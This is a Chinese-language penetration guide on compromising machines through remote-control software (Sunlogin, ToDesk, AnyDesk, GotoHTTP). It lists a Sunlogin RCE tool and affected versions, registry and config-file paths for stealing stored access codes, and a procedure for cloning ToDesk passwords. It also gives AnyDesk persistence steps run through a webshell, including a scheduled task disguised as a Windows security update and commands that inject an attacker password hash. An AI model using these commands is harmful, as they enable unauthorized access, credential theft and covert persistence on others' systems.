内网远程控制总结
字数 1693 2025-08-06 12:21:02
内网远程控制软件渗透技术总结
前言
在内网渗透过程中,远程控制软件是常见的攻击目标。本文总结了针对向日葵、ToDesk、AnyDesk和GotoHTTP等远程控制软件的渗透技术,包括漏洞利用、配置窃取和绕过防御等方法。
向日葵远程控制软件渗透
向日葵版本查看
在渗透前需要先确认目标向日葵版本,判断是否存在可利用漏洞。
可攻击版本利用
受影响版本:
- 向日葵个人版for Windows ≤ 11.0.0.33
- 向日葵简约版 ≤ V1.0.1.43315(2021.12)
- 测试客户端漏洞版本: 11.0.0.33162
攻击步骤:
- 检查Sunlogin进程是否存在:
tasklist - 使用Golang工具进行攻击:https://github.com/Mr-xn/sunlogin_rce
不可攻击版本渗透方法
1. 窃取配置文件解密(低版本)
配置文件路径:
- 安装版:
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini - 便携版:
C:\ProgramData\Oray\SunloginClient\config.ini
关键参数:
encry_pwd:本机验证码fastcode:本机识别码(去掉开头字母)sunlogincode:判断用户是否登录状态
利用方法:
将配置文件下载到攻击机,重新开启向日葵即可使用窃取的凭证。
2. 注册表查询(12.5.2之前版本)
查询注册表获取凭证信息:
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo
注意:向日葵高于12.5.3.*的版本已无法通过此方法获取secret。
ToDesk远程控制软件渗透
常见渗透方式(配置文件窃取)
配置文件路径:C:\Program Files\ToDesk\config.ini
攻击步骤:
- 攻击机安装ToDesk
- 读取目标机的config.ini文件
- 将目标机的
tempauthpassex值替换到攻击机的配置文件中 - 修改攻击机密码更新频率
- 两机密码将变为相同
AnyDesk远程控制软件渗透
情景复现1:绕过Windows Defender
前提条件:
- 已获取受害机普通权限webshell
- 受害机开启Windows Defender
攻击步骤:
-
攻击机准备:
- 下载并安装AnyDesk
- 清除旧配置:删除
C:\Users\用户名\AppData\Roaming\AnyDesk中的文件 - 打开AnyDesk,记录ID
- 设置自主访问密码(示例:Q16G666!!)
- 完全退出AnyDesk(包括托盘图标)
- 复制生成的四个配置文件并删除原文件
-
受害机操作:
- 通过webshell下载AnyDesk到用户目录
- 创建配置文件路径:
C:\Users\用户名\AppData\Roaming\AnyDesk - 将攻击机的四个配置文件复制到此目录
-
连接控制:
- 攻击机重新打开AnyDesk
- 受害机运行AnyDesk
- 攻击机使用记录的ID和设置的密码连接
情景复现2:计划任务执行
适用场景:命令行无法直接执行时
攻击步骤:
- 确定当前用户:
powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]"
- 创建计划任务:
schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU 用户名
- 执行计划任务:
schtasks /run /tn Windows_Security_Update
- 添加密码哈希到配置文件:
echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
- 查看用户ID:
type C:\Users\用户名\AppData\Roaming\AnyDesk\system.conf
AnyDesk渗透优缺点
优点:
- 整个过程无需UAC弹窗,实现无感绕过
缺点:
- 会弹出AnyDesk界面
- 需要桌面用户权限启动,IIS等中间件获取的webshell通常无法成功启动
GotoHTTP渗透
特点:浏览器连接,方便快捷,但权限划分明确
复现过程:
- 下载GotoHTTP:https://gotohttp.com/
- 上传到目标机并运行
- 在当前目录生成配置文件
- 读取配置文件获取连接信息
限制:普通用户权限启动的GotoHTTP无法进行管理员操作(如关闭Windows Defender)
参考资源
- https://blog.csdn.net/weixin_44216796/article/details/112118108
- https://github.com/Mr-xn/sunlogin_rce